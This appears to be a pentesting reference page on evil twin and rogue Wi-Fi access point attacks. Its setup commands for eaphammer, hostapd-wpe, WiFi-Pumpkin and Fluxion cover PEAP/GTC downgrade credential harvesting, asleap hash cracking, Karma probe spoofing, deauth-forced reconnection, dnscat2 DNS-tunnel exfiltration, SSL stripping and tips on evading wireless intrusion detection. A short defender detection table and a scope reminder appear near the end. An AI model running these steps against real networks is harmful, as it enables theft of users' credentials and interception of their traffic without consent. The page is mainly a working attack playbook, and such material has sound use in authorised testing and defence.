Evil Twin and Rogue Access Point

#Overview

An evil twin is a rogue access point that mimics a legitimate AP's SSID, security type, and often MAC address to trick clients into connecting. Once connected, the attacker can intercept traffic, harvest credentials, and launch further attacks. This is the primary attack against enterprise WPA2-802.1X networks and a powerful technique for credential phishing on PSK networks.

Rogue APs are related but broader — any unauthorized access point set up by the attacker, whether it mimics a legitimate AP or not.

#Attack Decision Tree

Goal: Harvest Credentials or Intercept Traffic?
  |
  |-- Credential Harvesting (Enterprise 802.1X)
  |     |-- PEAP network? --> eaphammer (PEAP/GTC downgrade)
  |     |-- EAP-TTLS network? --> hostapd-wpe
  |     |-- EAP-TLS network? --> Certificate theft or social engineering
  |     |-- Unknown EAP type? --> Probe with eaphammer
  |
  |-- Credential Harvesting (PSK)
  |     |-- Captive portal --> WiFi-Pumpkin / Fluxion
  |     |-- Force reconnection --> Deauth + evil twin
  |
  |-- Traffic Interception
  |     |-- Open network --> Rogue AP (no encryption)
  |     |-- WPA2 network --> Downgrade to open or WEP
  |     |-- HTTPS targets --> SSL strip or bypass
  |
  |-- Karma Attack
        |-- Respond to all probe requests --> hostapd-wpe / eaphammer

TEXT

#Setup: Evil Twin with eaphammer

eaphammer is the most capable tool for enterprise evil twin attacks, supporting PEAP, EAP-TTLS, EAP-FAST, and credential harvesting.

#Installation

# Install eaphammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup

# Or via pip
pip install eaphammer

BASH

#PEAP/GTC Downgrade Attack

This is the most common enterprise attack — downgrades PEAP/MSCHAPv2 to PEAP/GTC, which sends the username and password in cleartext (or easily crackable challenge-response).

# Basic evil twin with PEAP/GTC downgrade
sudo eaphammer --interface wlan0 \
  --essid "<Corporate-SSID>" \
  --channel <CH> \
  --auth peap \
  --wpa 2

# With captive portal for credential harvesting
sudo eaphammer --interface wlan0 \
  --essid "<Corporate-SSID>" \
  --channel <CH> \
  --auth peap \
  --wpa 2 \
  --captive-portal

# Full enterprise evil twin with all options
sudo eaphammer --interface wlan0 \
  --essid "<Corporate-SSID>" \
  --channel <CH> \
  --auth peap \
  --wpa 2 \
  --captive-portal \
  --lport 80 \
  --ap-port 443

BASH

#Monitoring Captured Credentials

# eaphammer logs credentials to console and file
# Check the log file for captured MS-CHAPv2 hashes and cleartext credentials
cat /tmp/eaphammer-*.log

# MS-CHAPv2 hashes can be cracked with asleap
asleap -C <challenge> -R <response> -W wordlist.txt

# Or convert for hashcat
# hashcat mode 5500 = NetNTLMv1, mode 5600 = NetNTLMv2

BASH

#Setup: Evil Twin with hostapd-wpe

hostapd-wpe (Wireless Pwnage Edition) is a patched hostapd that logs EAP credentials and supports PEAP/GTC downgrade.

#Configuration

# Create hostapd-wpe configuration
cat > /tmp/hostapd-wpe.conf << 'EOF'
interface=wlan0
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CH>
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=<password>
dh_file=/etc/hostapd-wpe/dh.pem
EOF

# Start the evil twin
sudo hostapd-wpe /tmp/hostapd-wpe.conf

BASH

#Captured Credentials

# hostapd-wpe logs to /tmp/hostapd-wpe.log
# Captured credentials include:
# - Username
# - MS-CHAPv2 challenge/response (crackable with asleap)
# - EAP-Identity
# - GTC cleartext passwords

# Crack MS-CHAPv2
asleap -C <challenge> -R <response> -W wordlist.txt

BASH

#Setup: Captive Portal (WiFi-Pumpkin / Fluxion)

For PSK networks, a captive portal is more effective than EAP downgrade. The attacker deauths clients and presents a fake login page that mimics the AP's management interface.

#WiFi-Pumpkin

# Install WiFi-Pumpkin
pip3 install wifi-pumpkin

# Start WiFi-Pumpkin
sudo wifi-pumpkin

# In the GUI:
# 1. Set SSID to target network name
# 2. Set interface and channel
# 3. Enable "Captive Portal" plugin
# 4. Configure the portal page (mimic router login)
# 5. Start the access point
# 6. Deauth clients to force reconnection to evil twin

BASH

#Fluxion

# Install Fluxion
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion
sudo ./fluxion.sh

# Fluxion workflow:
# 1. Scan for target networks
# 2. Capture handshake (for verification)
# 3. Start evil twin AP
# 4. Deauth clients
# 5. Present captive portal
# 6. Capture entered credentials
# 7. Verify against captured handshake

BASH

#Karma Attacks

Karma attacks respond to all client probe requests, making the evil twin appear as any network the client has previously connected to.

# eaphammer with Karma
sudo eaphammer --interface wlan0 \
  --essid "" \
  --channel <CH> \
  --auth peap \
  --wpa 2 \
  --karma

# hostapd-wpe with Karma (via karma patch)
# The Karma patch makes the AP respond to all directed probe requests
# regardless of SSID

BASH

#LNR (Lazy Network Research) Attack

A variation of Karma that responds to directed probe requests with matching SSIDs, making the AP appear as any saved network.

# Monitor probe requests first
sudo airodump-ng wlan0mon
# Note common SSIDs from probe requests

# Configure the evil twin to respond to those SSIDs
# eaphammer supports multiple SSIDs
sudo eaphammer --interface wlan0 \
  --essid "Starbucks" \
  --essid "HotelWiFi" \
  --essid "CorporateGuest" \
  --channel <CH> \
  --captive-portal

BASH

#DNS Tunneling Through Evil Twin

For exfiltrating data through the evil twin when direct internet access isn't available:

# Set up DNS tunneling on the evil twin
# Terminal 1: Start evil twin with internet relay
sudo eaphammer --interface wlan0 \
  --essid "<SSID>" \
  --channel <CH> \
  --internet \
  --auth peap

# Terminal 2: DNS tunnel server (dnscat2)
ruby dnscat2.rb --dns host=example.com,port=53

# Terminal 3: DNS tunnel client (on compromised device)
./dnscat --dns host=example.com,port=53

BASH

#SSL Strip and HTTPS Bypass

When intercepting traffic through the evil twin:

# Start the evil twin with internet relay
sudo eaphammer --interface wlan0 --essid "<SSID>" --channel <CH> --internet

# Run SSL strip on the relay interface
sslstrip -l 8080

# Or use bettercap for SSL stripping
sudo bettercap -iface <relay_interface>
net.sniff on
net.sniff.sslstrip on

BASH

#Detection

#How Defenders Detect Evil Twins

Detection Method	Indicator
BSSID anomaly	Multiple BSSIDs for the same SSID
Signal strength variation	Stronger signal from attacker than legitimate AP
Channel mismatch	Evil twin on different channel than legitimate AP
Security type mismatch	Evil twin advertises different security (e.g., WPA2 vs open)
Certificate mismatch	Self-signed or wrong CA in EAP-TLS/PEAP
DHCP lease mismatch	Clients getting IPs from attacker's DHCP
WIDS correlation	Multiple APs for same SSID from different locations

#Evasion Techniques

Match the legitimate AP's channel and security settings exactly
Use the same BSSID as the legitimate AP (MAC spoofing)
Position the evil twin closer to target clients (stronger signal)
Use a legitimate-looking captive portal (mimic the real AP's login page)
Use SSL stripping or self-signed certificates that match the organization's domain

#Common Pitfalls

Internet access: Clients expect internet access. Without it, they may disconnect. Always use --internet relay or set up NAT.
Channel selection: Use the same channel as the legitimate AP for maximum client confusion.
Certificate warnings: PEAP clients may show certificate warnings. Users who click through these warnings expose their credentials.
Client caching: Modern clients cache AP information and may prefer the legitimate AP. Deauth helps force reconnection.
DHCP exhaustion: If many clients connect simultaneously, the DHCP pool may be exhausted. Use a large enough range.

#OPSEC Considerations

Evil twin APs are visible to anyone scanning for WiFi networks
WIDS/WIPS will detect duplicate SSIDs with different BSSIDs
The evil twin's signal strength, channel, and security type may not match the legitimate AP
Captive portal phishing pages are detectable by security-aware users
Deauthentication frames to force reconnection are logged by enterprise APs
Always verify scope explicitly includes evil twin/rogue AP attacks

#Cross-References

WPA/WPA2 Cracking — Handshake capture as an alternative to evil twin
Deauthentication Attacks — Deauth to force clients to evil twin
802.1X Attacks — Enterprise authentication exploitation
Captive Portal Bypass — The other side: bypassing captive portals
Wireless Client Attacks — Karma and probe request attacks

#Tool References

Tool	Purpose	Link
eaphammer	Enterprise evil twin, PEAP downgrade	https://github.com/s0lst1c3/eaphammer
hostapd-wpe	Rogue AP with credential logging	https://github.com/OpenSecurityResearch/hostapd-wpe
WiFi-Pumpkin	Rogue AP framework with captive portal	https://github.com/P0cL4b/WiFi-Pumpkin
Fluxion	Automated evil twin with captive portal	https://github.com/FluxionNetwork/fluxion
asleap	MS-CHAPv2 cracking	https://github.com/joswr1ght/asleap
bettercap	WiFi recon, deauth, MITM	https://www.bettercap.org/
dnscat2	DNS tunneling through evil twin	https://github.com/iagox86/dnscat2